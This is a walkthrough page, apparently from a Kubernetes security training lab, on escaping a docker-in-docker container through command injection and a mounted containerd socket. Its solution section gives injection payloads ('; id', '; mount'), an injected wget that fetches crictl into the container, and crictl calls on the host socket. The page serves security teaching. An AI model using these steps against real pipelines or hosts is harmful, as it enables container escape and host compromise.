🚀 Scenarios

⎈ DIND (docker-in-docker) exploitation

Welcome

⎈ DIND (docker-in-docker)
exploitation
🙌 Overview
In this scenario, we will be focusing on the common and standard ways how to build systems
and pipelines that leverage container sockets to create, build and run containers from the
underlying container runtime. This has been exploited since the early days of the container
ecosystem and even today we see these misconfigurations/use cases in the real world.

By the end of the scenario, we will understand and learn the following
1. You will learn to test and exploit the container UNIX socket misconfigurations
2. Able to exploit container and escape out of the docker container
3. Learn common misconfigurations in pipelines and CI/CD build systems

⚡️ The story
Most of the CI/CD and pipeline systems use the underlying host container runtime to build
containers for you within the pipeline by using something called DIND (docker-in-docker) with

a UNIX socket. Here in this scenario, we try to exploit this misconfiguration and gain access to
the host system of the worker node by escaping out of the docker container.

INFO

To get started with the scenario, navigate to http://127.0.0.1:1231

🎯 Goal
The goal of this scenario is to escape out of the running docker container to the host system
where the container is running and able to access and perform actions on other container
running on the same node.

TIP

If you are able to obtain container images in the host system then you have completed
this scenario. But definitely, you can advance beyond this exploitation as well by
performing post-exploitation.

Hints & Spoilers
✨ Do you know how to run multiple commands in Linux?
✨ Able to run system commands, not sure how to access containers?

🎉 Solution & Walkthrough
🎲 Method 1
By looking at the application functionality and dabbling with the input and output, we can
see it has standard command injection vulnerability. Assuming it's running in a Linux
container we can use the ; delimiter to run/pass other commands

127.0.0.1; id

As we can see it returns the response for the id command, now we can analyze the
system and see what potential information we can obtain
It contains containerd.sock mounted into the file system as it's not available commonly
in standard systems

; mount

Wow! we can see the /custom/containerd/containerd.sock mounted in the file system
and assuming it's mounted from the host system we need to talk to it for communicating
with the UNIX socket

TIP

We can use multiple methods for communicating with the containerd.sock UNIX socket.
Some of them include crictl binary, or a simple curl program as well.
Next we can download the crictl static binary from the internet

https://github.com/kubernetes-sigs/cri-tools/releases. In order to determine which binary
we need, we can run the following command for system discovery

;uname -a

We can examine the output to determine our system architecture and OS, then download
the appropriate binary to the container. For example, if our target system is a x86_64
Linux box, we can use the following command

;wget https://github.com/kubernetes-sigs/critools/releases/download/v1.27.1/crictl-v1.27.1-linux-amd64.tar.gz -O
/tmp/crictl-v1.27.1.tar.gz

We can extract the binary from the crictl-v1.27.1.tgz file so that we can use that to
talk to the UNIX socket

;tar -xvf /tmp/crictl-v1.27.1.tar.gz -C /tmp/

Now we can access the host system by running the following crictl commands with passing
containerd.sock UNIX socket

;/tmp/crictl -r unix:///custom/containerd/containerd.sock images

Hooray 🥳 , now we can see that it has a lot of container images in the host system. We
can now use different crictl commands to gain more access and further exploitation

TIP

You can do the analog steps with ctr and interact with the containerd runtime. crictl
shows you containers as visible in kubernetes. ctr shows also additional containers, such
as kubernetes hidden pause containers.

Edit this page

